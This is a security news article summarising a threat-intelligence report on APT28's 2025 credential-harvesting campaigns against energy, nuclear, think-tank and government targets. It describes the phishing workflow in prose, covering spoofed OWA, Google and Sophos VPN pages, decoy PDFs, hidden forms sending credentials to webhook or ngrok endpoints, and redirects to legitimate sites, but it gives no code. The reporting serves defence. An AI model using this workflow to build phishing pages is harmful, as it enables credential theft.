Russia-linked cyberespionage group APT28 targets energy, nuclear, and policy staff in Turkey, Europe, North Macedonia, and Uzbekistan with credential-harvesting attacks.
Between February and September 2025, Recorded Future’s Insikt Group observed Russia-linked group APT28 (aka UAC-0001, Fancy Bear, Pawn Storm, Sofacy Group, Sednit, BlueDelta, and STRONTIUM) running credential-harvesting campaigns. Targets included Turkish energy and nuclear agency staff, European think tank personnel, and organizations in North Macedonia and Uzbekistan. The cyber espionage group used regionally tailored lures, reflecting interest in energy, defense, and government networks aligned with Russian intelligence priorities. This marks an expansion of its ongoing operations.
APT28 used fake login pages mimicking Outlook, Google, and Sophos VPN to steal credentials, redirecting victims to real sites. They relied on free hosting, tunneling services, and PDF lures, showing the GRU’s ongoing, low-cost focus on credential harvesting for intelligence purposes.
“BlueDelta expanded its credential-harvesting operations throughout 2025, deploying new campaigns themed as Microsoft Outlook Web Access (OWA), Google, and Sophos VPN login portals.
The group leveraged a combination of free hosting and tunneling services, including Webhook[.]site, InfinityFree, Byet Internet Services, and ngrok, to host credential-harvesting pages and exfiltrate stolen data.” reads the report published by the Insikt Group.
“Multiple campaigns incorporated legitimate PDF lure documents, such as publications from the Gulf Research Center and the EcoClimate Foundation, to increase the appearance of authenticity and bypass email security controls.”
The campaigns redirected victims to legitimate sites after credential theft to avoid detection. They used free hosting and tunneling services like Webhook[.]site, InfinityFree, Byet Internet Services, and ngrok to host phishing pages, exfiltrate data, and enable redirects.
To appear credible, attackers embedded real PDF lures, including Gulf Research Center and ECCO publications. Phishing emails led to decoy PDFs for a few seconds before showing spoofed Microsoft OWA pages that secretly sent credentials to webhook endpoints, then redirected users back to legitimate content.
BlueDelta ran credential‑harvesting campaigns using free hosting and tunneling services to keep costs low and infrastructure disposable. In February 2025, it deployed spoofed Microsoft OWA login pages delivered through shortened links and Webhook[.]site. Victims were first shown legitimate PDF lures from trusted think tanks, then redirected to fake login pages that captured emails, passwords, IPs, and user agents via hidden HTML and JavaScript beacons, before redirecting back to the real PDFs. Later campaigns reused the same approach with updated scripts, Turkish‑language lures, and targets tied to energy research, highlighting BlueDelta’s iterative refinement of low‑effort, high‑yield credential theft.
APT28 continued its credential-harvesting campaigns in 2025, targeting VPNs, Microsoft OWA, and Google accounts. On June 4, they deployed a Sophos VPN password-reset spoof page hosted on a free InfinityFree domain, capturing victim credentials via JavaScript that extracted unique identifiers from the URL and sent them to attacker-controlled endpoints before redirecting to a legitimate VPN portal, likely the intended target.
In September, the cyberespionage group used similar techniques on OWA expired-password pages hosted on InfinityFree domains, redirecting victims to legitimate login pages of a North Macedonian military organization and an IT firm in Uzbekistan.
In April, Portuguese-language Google password-reset phishing pages were hosted on free domains (Byet Internet Services and InfinityFree) using ngrok proxies to exfiltrate credentials. The campaign reused tradecraft from previous attacks, including hidden HTML forms, JavaScript validation, and staged redirection, showing BlueDelta’s persistent use of low-cost, disposable infrastructure for targeted credential theft.
“Insikt Group has not previously observed BlueDelta using Google-themed credential-harvesting pages in its past campaigns; however, the consistent use of Byet and InfinityFree domains, together with ngrok for exfiltration, and additional tradecraft similarities point to a likely overlap. Based on these parallels, we assess that this activity is likely associated with BlueDelta.” concludes the report that includes Indicators of Compromise (IoCs) and mitigations.
The APT28 group has been active since at least 2007 and it has targeted governments, militaries, and security organizations worldwide. The group was involved also in the string of attacks that targeted 2016 Presidential election.
The group operates out of military unity 26165 of the Russian General Staff Main Intelligence Directorate (GRU) 85th Main Special Service Center (GTsSS).
Russian GRU Unit 26165 has targeted dozens of Western logistics and tech firms tied to Ukraine aid, including defense, maritime, air, and rail sectors across NATO nations and Ukraine. They exploited business ties to expand access, even probing ICS makers for railway systems. Targets span 13 countries, including the U.S., Germany, and France.
Follow me on Twitter: @securityaffairs and Facebook and Mastodon
(SecurityAffairs – hacking, Russia)
